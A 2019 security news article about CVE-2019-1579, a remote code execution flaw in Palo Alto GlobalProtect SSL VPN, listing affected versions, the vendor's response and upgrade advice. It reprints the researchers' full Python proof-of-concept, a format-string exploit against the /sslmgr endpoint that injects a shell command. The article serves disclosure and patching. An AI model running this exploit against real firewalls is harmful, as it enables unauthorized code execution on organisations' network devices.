IS researchers published a PoC code for critical vulnerabilities in Palo Alto Networks firewalls

by Brendan Smith
July 23, 2019

Company Palo Alto Networks quietly fixed the critical vulnerability in its corporate SSL GlobalProtect SSL VPN solution implemented in Palo Alto firewalls.

Exploiting the vulnerability allowed attackers remotely execute an arbitrary code. Vulnerability (CVE-2019-1579) affecting the GlobalProtect solution and the GlobalProtect Gateway interface can be exploited by an unauthorized attacker by sending a specially crafted request to the device.

Security researchers Orange Tsai and Meh Chang discovered the bug.

“We surveyed all Palo Alto SSL VPN over the world to see if there is any large corporations using the vulnerable GlobalProtect, and Uber is one of them!”, — said researchers.

Uber took a very quick response and right step to fix the vulnerability.

Affect versions:

According to our survey, all the GlobalProtect before July 2018 are vulnerable! Here is the affect version list:

  • Palo Alto GlobalProtect SSL VPN 7.1.x < 7.1.19
  • Palo Alto GlobalProtect SSL VPN 8.0.x < 8.0.12
  • Palo Alto GlobalProtect SSL VPN 8.1.x < 8.1.3

PoC-code:

Experts published the PoC-code to demonstrate the process of exploiting the vulnerability.

#!/usr/bin/python

import requests
from pwn import *

url = "https://sslvpn/sslmgr"
cmd = "echo pwned > /var/appweb/sslvpndocs/hacked.txt"

strlen_GOT = 0x667788 # change me
system_plt = 0x445566 # change me

fmt =  '%70$n'
fmt += '%' + str((system_plt>>16)&0xff) + 'c'
fmt += '%32$hn'
fmt += '%' + str((system_plt&0xffff)-((system_plt>>16)&0xff)) + 'c'
fmt += '%24$hn'
for i in range(40,60):
    fmt += '%'+str(i)+'$p'

data = "scep-profile-name="
data += p32(strlen_GOT)[:-1]
data += "&appauthcookie="
data += p32(strlen_GOT+2)[:-1]
data += "&host-id="
data += p32(strlen_GOT+4)[:-1]
data += "&user-email="
data += fmt
data += "&appauthcookie="
data += cmd
r = requests.post(url, data=data)

Read also: Drupal fixed a critical vulnerability that could be used to hijack sites

How to fix?

When researchers reported about this bug in Palo Alto Networks, however, they got the following reply:

“Thanks for the submission. Palo Alto Networks does follow coordinated vulnerability disclosure for security vulnerabilities that are reported to us by external researchers. We do not CVE items found internally and fixed. This issue was previously fixed, but if you find something in a current version, please let us know”, — commented in Palo Alto Networks.

So, it seems, this vulnerability is known for Palo Alto, but not ready for the world.

Administrators are urged to upgrade to PAN-OS versions 7.1.19 and higher, 8.0.12 and higher, 8.1.3 and later.

Sending
User Review
0 (0 votes)
Comments Rating 0 (0 reviews)

About the author

Brendan Smith

Cybersecurity analyst with 15+ years digging into malware and threats, from early days reverse-engineering trojans to leading incident responses for mid-sized firms.

At Gridinsoft, I handle peer-reviewed breakdowns of stuff like AsyncRAT ransomware—last year, my guides helped flag 200+ variants in real scans, cutting cleanup time by 40% for users. Outside, I write hands-on tutorials on howtofix.guide, like step-by-step takedowns of pop-up adware using Wireshark and custom scripts (one post on VT alternatives got 5k reads in a month).

Certified CISSP and CEH, I’ve run webinars for 300+ pros on AI-boosted stealers—always pushing for simple fixes that stick, because nobody has time for 50-page manuals. Tools of the trade: Splunk for hunting, Ansible for automation, and a healthy dose of coffee to outlast the night shifts.

View all posts

Leave a Reply

Sending